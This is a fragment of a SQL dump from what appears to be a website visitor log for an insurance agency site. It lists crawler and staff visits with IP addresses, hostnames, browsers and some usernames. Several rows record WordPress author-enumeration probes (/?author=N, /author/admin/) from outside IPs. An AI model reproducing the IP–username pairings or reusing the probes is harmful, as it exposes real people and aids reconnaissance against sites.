help@moz.com)','','',0,'','','','','','dotbot','','','','0','0',0),(4524,'0b_7e009558c0dc1d744a30a332954238a9','1457953705','40.77.167.46','msnbot-40-77-167-46.search.msn.com','/case-success-voya-turns-aviation-case-into-the-friendly-skies-for-218k-of-target/','Mozilla/5.0 (compatible; bingbot/2.0; http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(4527,'0b_7e009558c0dc1d744a30a332954238a9','1457953749','40.77.167.46','msnbot-40-77-167-46.search.msn.com','/robots.txt','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(4530,'0b_7e009558c0dc1d744a30a332954238a9','1457953752','40.77.167.46','msnbot-40-77-167-46.search.msn.com','/case-success-voya-turns-aviation-case-into-the-friendly-skies-for-218k-of-target/','Mozilla/5.0 (compatible; bingbot/2.0; http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(4533,'0b_9751501bff9ba32222d40df04f2d55e1','1457959713','66.249.73.178','crawl-66-249-73-178.googlebot.com','/','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(4536,'0b_9751501bff9ba32222d40df04f2d55e1','1457960236','66.249.73.178','crawl-66-249-73-178.googlebot.com','/term-quotes/','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(4539,'0b_2462bfb01a26dff7074ee1613a94ee48','1457960481','157.55.39.100','msnbot-157-55-39-100.search.msn.com','/agent-tools/','Mozilla/5.0 (compatible; bingbot/2.0; http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(4541,'0b_6e014506dd3e7ab27b07a0198051c22c','1457961299','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','','','','','roisy','','0','0',0),(4544,'0b_6e014506dd3e7ab27b07a0198051c22c','1457961301','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','','','','','roisy','','0','0',0),(4545,'0b_c84aafbb4ecb75c6945bdfcadb40d9a8','1457961629','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','','',0,'Win7','Chrome 48','us','','','','','roisy','','0','0',0),(4547,'0b_c84aafbb4ecb75c6945bdfcadb40d9a8','1457961630','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 48','us','','','','','roisy','','0','0',0),(4550,'0b_3388d915bafa78a1d7ce49e040709607','1457961833','208.115.111.66','208-115-111-66-reverse.wowrack.com','/robots.txt','Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)','','',0,'','','','','','dotbot','','','','0','0',0),(4551,'0b_07178532e223aed6640b2e3a9605f9f3','1457963828','66.249.83.209,75.99.37.250','ool-4b6325fa.static.optonline.net','/','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.75 Safari/537.36 Google Favicon','','',0,'Linux','Google Chrome','','','','','','','','0','0',0),(4553,'0b_ef194d2f4d16acf1f581d957419927b2','1457964119','40.77.167.46','msnbot-40-77-167-46.search.msn.com','/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(4556,'0b_cc5d3c6b00f2e6fbf15a911f429e055f','1457964396','67.78.198.18','remote.suncoastinternalmed.com','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','https://www.google.com/','_notprovided_',1,'Win7','Chrome 48','us','','Google','','','','','0','0',0),(4559,'0b_cc5d3c6b00f2e6fbf15a911f429e055f','1457964398','67.78.198.18','remote.suncoastinternalmed.com','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 48','us','','','','','','','0','0',0),(4560,'0b_5dbe263af3972c45c70b92acc8525cfa','1457964808','75.99.37.250','ool-4b6325fa.static.optonline.net','/feed/','Mozilla/5.0 (compatible; Google Desktop/5.9.911.3589; http://desktop.google.com/)','','',0,'','','','','','Google','','','','0','0',0),(4563,'0b_52575ac70b484126b8e716f5d509f042','1457964881','207.46.13.148','msnbot-207-46-13-148.search.msn.com','/hot.htm','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(4565,'0b_49f932fa277bf287216aaa3f8c5bfbeb','1457964998','157.55.39.100','msnbot-157-55-39-100.search.msn.com','/forms/','Mozilla/5.0 (compatible; bingbot/2.0; http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(4566,'0b_52575ac70b484126b8e716f5d509f042','1457965608','207.46.13.148','msnbot-207-46-13-148.search.msn.com','/prodmod-john-hancock-is-discontinuing-sale-of-ny-partnership-custom-care-iii-ltc-product/','Mozilla/5.0 (compatible; bingbot/2.0; http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(4568,'0b_6e014506dd3e7ab27b07a0198051c22c','1457967116','108.58.88.178','ool-6c3a58b2.static.optonline.net','/term-quotes/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','1536 x 864','','','','roisy','','0','0',0),(4571,'0b_35ff35d92ec4166cbc7aa95f560ab666','1457967817','208.115.111.66','208-115-111-66-reverse.wowrack.com','/home/feed/','Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)','','',0,'','','','','','dotbot','','','','0','0',0),(4572,'0b_5b772a0f4edb5ba18db9cdcd5b6ae90a','1457968004','69.175.22.218','newscan02.sitelock.com','/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(4574,'0b_5b772a0f4edb5ba18db9cdcd5b6ae90a','1457968007','69.175.22.218','newscan02.sitelock.com','/th1s_1s_a_4o4.html','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(4577,'0b_5b772a0f4edb5ba18db9cdcd5b6ae90a','1457968009','69.175.22.218','newscan02.sitelock.com','/term-quotes/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(4578,'0b_5b772a0f4edb5ba18db9cdcd5b6ae90a','1457968014','69.175.22.218','newscan02.sitelock.com','/contact/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(4580,'0b_5b772a0f4edb5ba18db9cdcd5b6ae90a','1457968016','69.175.22.218','newscan02.sitelock.com','/home/feed/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(4581,'0b_5b772a0f4edb5ba18db9cdcd5b6ae90a','1457968018','69.175.22.218','newscan02.sitelock.com','/about-us/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(4584,'0b_5b772a0f4edb5ba18db9cdcd5b6ae90a','1457968020','69.175.22.218','newscan02.sitelock.com','/insentives/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(4586,'0b_5b772a0f4edb5ba18db9cdcd5b6ae90a','1457968022','69.175.22.218','newscan02.sitelock.com','/about-us/meet-the-eib-team/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(4587,'0b_5b772a0f4edb5ba18db9cdcd5b6ae90a','1457968024','69.175.22.218','newscan02.sitelock.com','/meet-the-eib-team/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(4590,'0b_df10154bc5b2060be42699c4a4f89204','1457969183','40.77.167.46','msnbot-40-77-167-46.search.msn.com','/?page_id=171?a=pwdreset','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(4593,'0b_bd62957a5b1e1ec181649bab4bfade03','1457969794','180.150.226.116','180.150.226.116','/?author=1','Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)','http://empireins.com/?author=1','',0,'Win7','IE 9','cn','','','','','','','0','0',0),(4595,'0b_5be8cdf3e8e82048c0d48cdf1f5c6403','1457969845','180.150.226.116','180.150.226.116','/?author=1','Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)','','',0,'Win2000','IE 6','','','','','','','','0','0',0),(4598,'0b_5be8cdf3e8e82048c0d48cdf1f5c6403','1457969890','180.150.226.116','180.150.226.116','/author/admin/','Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)','','',0,'Win2000','IE 6','','','','','','','','0','0',0),(4599,'0b_5be8cdf3e8e82048c0d48cdf1f5c6403','1457969929','180.150.226.116','180.150.226.116','/?author=2','Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)','','',0,'Win2000','IE 6','','','','','','','','0','0',0),(4602,'0b_5be8cdf3e8e82048c0d48cdf1f5c6403','1457970061','180.150.226.116','180.150.226.116','/?author=3','Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)','','',0,'Win2000','IE 6','','','','','','','','0','0',0),(4604,'0b_5be8cdf3e8e82048c0d48cdf1f5c6403','1457970122','180.150.226.116','180.150.226.116','/?author=4','Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)','','',0,'Win2000','IE 6','','','','','','','','0','0',0),(4607,'0b_e2dd93d5865b0f23ff4d8c3359019c08','1457970142','40.77.167.46','msnbot-40-77-167-46.search.msn.com','/','Mozilla/5.0 (compatible; bingbot/2.0; http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(4608,'0b_5be8cdf3e8e82048c0d48cdf1f5c6403','1457970292','180.150.226.116','180.150.226.116','/?author=5','Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)','','',0,'Win2000','IE 6','','','','','','','','0','0',0),(4611,'0b_f47989eaa1e77ba308ac776618c51f02','1457971060','141.8.143.235','spider-141-8-143-235.yandex.com','/robots.txt','Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)','','',0,'','','','','','Yandex','','','','0','0',0),(4613,'0b_f47989eaa1e77ba308ac776618c51f02','1457971128','141.8.143.235','spider-141-8-143-235.yandex.com','/members/','Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)','','',0,'','','ru','','','Yandex','','','','0','0',0),(4616,'0b_9a658e37485742844b030875f1f90399','1457973413','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','','','','','','','0','0',0),(4619,'0b_9a658e37485742844b030875f1f90399','1457973415','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','','','','','','','0','0',0),(4622,'0b_597d29f390fb668cc02b6c7cc38b6471','1457973500','184.168.200.242','p3plcpnl0104.prod.phx3.secureserver.net','/js/mage/cookies.js','Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4','empireins.com','',0,'WinXP','Chrome 5','us','','','','','','','3','0',0),(4623,'0b_efcebe9d3b5e0019183748d534af21c4','1457974894','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','','',0,'Win7','Chrome 48','us','1920 x 1080','','','','','','0','0',0),(4626,'0b_efcebe9d3b5e0019183748d534af21c4','1457974896','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 48','us','1920 x 1080','','','','','','0','0',0),(4629,'0b_a796a96f3b398e341b19cfafb45a09d5','1457974987','67.81.56.252','ool-435138fc.dyn.optonline.net','/','Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; Touch; rv:11.0) like Gecko','','',0,'Win8 x64','IE 11','us','1366 x 768','','','','','','0','0',0),(4631,'0b_a796a96f3b398e341b19cfafb45a09d5','1457974989','67.81.56.252','ool-435138fc.dyn.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; Touch; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win8 x64','IE 11','us','1366 x 768','','','','','','0','0',0),(4632,'0b_a796a96f3b398e341b19cfafb45a09d5','1457974993','67.81.56.252','ool-435138fc.dyn.optonline.net','/agent-tools/','Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; Touch; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win8 x64','IE 11','us','1366 x 768','','','','','','0','0',0),(4634,'0b_a796a96f3b398e341b19cfafb45a09d5','1457975021','67.81.56.252','ool-435138fc.dyn.optonline.net','/term-quotes/','Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; Touch; rv:11.0) like Gecko','http://www.empireins.com/agent-tools/','',0,'Win8 x64','IE 11','us','1366 x 768','','','','zlberger','','0','51',0),(4635,'0b_86d2448652e8ac4098fcaae715df83cb','1457975555','130.185.155.74','130.185.155.74','/?author=1','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)','','',0,'Win7','IE 9','','','','','','','','0','0',0),(4638,'0b_86d2448652e8ac4098fcaae715df83cb','1457975565','130.185.155.74','130.185.155.74','/author/admin/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)','','',0,'Win7','IE 9','','','','','','','','0','0',0),(4640,'0b_86d2448652e8ac4098fcaae715df83cb','1457975576','130.185.155.74','130.185.155.74','/?author=2','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)','','',0,'Win7','IE 9','','','','','','','','0','0',0),(4643,'0b_efcebe9d3b5e0019183748d534af21c4','1457975749','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','','',0,'Win7','Chrome 48','us','1920 x 1080','','','','','','0','0',0),(4646,'0b_efcebe9d3b5e0019183748d534af21c4','1457975751','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 48','us','1920 x 1080','','','','','','0','0',0),(4647,'0b_efcebe9d3b5e0019183748d534af21c4','1457975756','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','','',0,'Win7','Chrome 48','us','1920 x 1080','','','','','','0','0',0),(4649,'0b_efcebe9d3b5e0019183748d534af21c4','1457975757','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 48','us','1920 x 1080','','','','','','0','0',0),(4650,'0b_efcebe9d3b5e0019183748d534af21c4','1457975773','108.58.88.178','ool-6c3a58b2.static.optonline.net','/case-status/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 48','us','1920 x 1080','','','','','','0','51',0),(4652,'0b_fcfe9f82dc48af82c4fb9e5963e6350d','1457975817','66.249.83.246,108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.75 Safari/537.36 Google Favicon','','',0,'Linux','Google Chrome','','','','','','','','0','0',0),(4655,'0b_05962ea791f7624329551f049c376d03','1457975817','66.249.83.209,108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.75 Safari/537.36 Google Favicon','','',0,'Linux','Google Chrome','','','','','','','','0','0',0),(4658,'0b_e4bcbf0f265a98f1351774e54521f1ba','1457975967','157.55.39.100','msnbot-157-55-39-100.search.msn.com','/insentives/','Mozilla/5.0 (compatible; bingbot/2.0; http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(4659,'0b_efcebe9d3b5e0019183748d534af21c4','1457976141','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','','',0,'Win7','Chrome 48','us','','','','','','','0','0',0),(4662,'0b_efcebe9d3b5e0019183748d534af21c4','1457976142','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 48','us','','','','','','','0','0',0),(4665,'0b_2ca6e000cf0dabb095183cc32db8f6f4','1457977239','208.125.14.78','rrcs-208-125-14-78.nyc.biz.rr.com','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','','',0,'Win7','Chrome 48','us','1680 x 1050','','','','','','0','0',0),(4667,'0b_2ca6e000cf0dabb095183cc32db8f6f4','1457977241','208.125.14.78','rrcs-208-125-14-78.nyc.biz.rr.com','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 48','us','1680 x 1050','','','','','','0','0',0),(4668,'0b_2ca6e000cf0dabb095183cc32db8f6f4','1457977249','208.125.14.78','rrcs-208-125-14-78.nyc.biz.rr.com','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 48','us','1680 x 1050','','','','','','0','0',0),(4670,'0b_ceab16763372d3e8c3d626cae0c87dbe','1457977333','208.125.14.78','rrcs-208-125-14-78.nyc.biz.rr.com','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','','',0,'Win7','Chrome 48','us','1920 x 1080','','','','abrahammermelstein','','0','0',0),(4673,'0b_ceab16763372d3e8c3d626cae0c87dbe','1457977336','208.125.14.78','rrcs-208-125-14-78.nyc.biz.rr.com','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 48','us','1920 x 1080','','','','abrahammermelstein','','0','0',0),(4674,'0b_ceab16763372d3e8c3d626cae0c87dbe','1457977339','208.125.14.78','rrcs-208-125-14-78.nyc.biz.rr.com','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 48','us','1920 x 1080','','','','abrahammermelstein','','0','51',0),(4677,'0b_ceab16763372d3e8c3d626cae0c87dbe','1457977366','208.125.14.78','rrcs-208-125-14-78.nyc.biz.rr.com','/term-quotes/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','http://www.empireins.com/agent-tools/','',0,'Win7','Chrome 48','us','1920 x 1080','','','','abrahammermelstein','','0','51',0),(4680,'0b_ceab16763372d3e8c3d626cae0c87dbe','1457977610','208.125.14.78','rrcs-208-125-14-78.nyc.biz.rr.com','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','','',0,'Win7','Chrome 48','us','1920 x 1080','','','','abrahammermelstein','','0','51',0),(4683,'0b_ceab16763372d3e8c3d626cae0c87dbe','1457977612','208.125.14.78','rrcs-208-125-14-78.nyc.biz.rr.com','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 48','us','1920 x 1080','','','','abrahammermelstein','','0','0',0),(4686,'0b_ceab16763372d3e8c3d626cae0c87dbe','1457977618','208.125.14.78','rrcs-208-125-14-78.nyc.biz.rr.com','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 48','us','1920 x 1080','','','','abrahammermelstein','','0','51',0),(4689,'0b_8310cecd80339b84ebdff6af0081be2c','1457977655','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','','',0,'Win7','Chrome 48','us','1920 x 1080','','','','','','0','0',0),(4691,'0b_8310cecd80339b84ebdff6af0081be2c','1457977657','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 48','us','1920 x 1080','','','','','','0','0',0),(4694,'0b_8310cecd80339b84ebdff6af0081be2c','1457977670','108.58.88.178','ool-6c3a58b2.static.optonline.net','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 48','us','1920 x 1080','','','','','','0','0',0),(4695,'0b_8310cecd80339b84ebdff6af0081be2c','1457977679','108.58.88.178','ool-6c3a58b2.static.optonline.net','/term-quotes/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','http://www.empireins.com/agent-tools/','',0,'Win7','Chrome 48','us','1920 x 1080','','','','Chaya','','0','51',0),(4698,'0b_2996ca83428c3044b89d4defca8d0620','1457978351','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','','','','','','','0','0',0),(4701,'0b_2996ca83428c3044b89d4defca8d0620','1457978353','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','','','','','','','0','0',0),(4703,'0b_2ac76bad36c500f87d5332b2805dd12d','1457979680','66.249.83.209,108.41.135.17','pool-108-41-135-17.nycmny.fios.verizon.net','/quotes.htm','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.75 Safari/537.36 Google Favicon','','',0,'Linux','Google Chrome','us','','','','','','','0','0',0),(4706,'0b_7ecaef27b94bd2504de288178c177503','1457980021','50.108.156.48','50.108.156.48','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','','',0,'Win7','Chrome 48','us','1920 x 1080','','','','ykaufman','','0','0',0),(4709,'0b_7ecaef27b94bd2504de288178c177503','1457980033','50.108.156.48','50.108.156.48','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 48','us','1920 x 1080','','','','ykaufman','','0','0',0),(4710,'0b_7ecaef27b94bd2504de288178c177503','1457980046','50.108.156.48','50.108.156.48','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 48','us','1920 x 1080','','','','ykaufman','','0','0',0),(4713,'0b_7ecaef27b94bd2504de288178c177503','1457980066','50.108.156.48','50.108.156.48','/term-quotes/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','http://www.empireins.com/agent-tools/','',0,'Win7','Chrome 48','us','1920 x 1080','','','','ykaufman','','0','51',0),(4715,'0b_bc1b2d4411789b1d829ce2ad82ea2e7f','1457981611','40.77.167.46','msnbot-40-77-167-46.search.msn.com','/case-success-voya-turns-aviation-case-into-the-friendly-skies-for-218k-of-target/','Mozilla/5.0 (compatible; bingbot/2.0; http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(4716,'0b_ad30dcc7bca84f4602f36c34d4fdb61e','1457982912','54.183.230.57','ec2-54-183-230-57.us-west-1.compute.amazonaws.com','/robots.txt','Mozilla/5.0 (compatible; DomainAppender /1.0; +http://www.profound.net/domainappender)','','',0,'','','','','','Unknown Spider','','','','0','0',0),(4718,'0b_ad30dcc7bca84f4602f36c34d4fdb61e','1457982912','54.183.230.57','ec2-54-183-230-57.us-west-1.compute.amazonaws.com','/robots.txt','Mozilla/5.0 (compatible; DomainAppender /1.0; +http://www.profound.net/domainappender)','','',0,'','','','','','Unknown Spider','','','','0','0',0),(4719,'0b_ad30dcc7bca84f4602f36c34d4fdb61e','1457982918','54.183.230.57','ec2-54-183-230-57.us-west-1.compute.amazonaws.com','/','Mozilla/5.0 (compatible; DomainAppender /1.0; +http://www.profound.net/domainappender)','','',0,'','','','','','','','','','0','0',0),(4721,'0b_ad30dcc7bca84f4602f36c34d4fdb61e','1457982977','54.183.230.57','ec2-54-183-230-57.us-west-1.compute.amazonaws.com','/about-us/','Mozilla/5.0 (compatible; DomainAppender /1.0; +http://www.profound.net/domainappender)','','',0,'','','','','','','','','','0','0',0),(4722,'0b_ad30dcc7bca84f4602f36c34d4fdb61e','1457982977','54.183.230.57','ec2-54-183-230-57.us-west-1.compute.amazonaws.com','/contact/','Mozilla/5.0 (compatible; DomainAppender /1.0; +http://www.profound.net/domainappender)','','',0,'','','','','','','','','','0','0',0),(4725,'0b_55d58c3c955b3bb8649c74331b6950ed','1457983095','108.58.88.178','ool-6c3a58b2.static.optonline.net','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 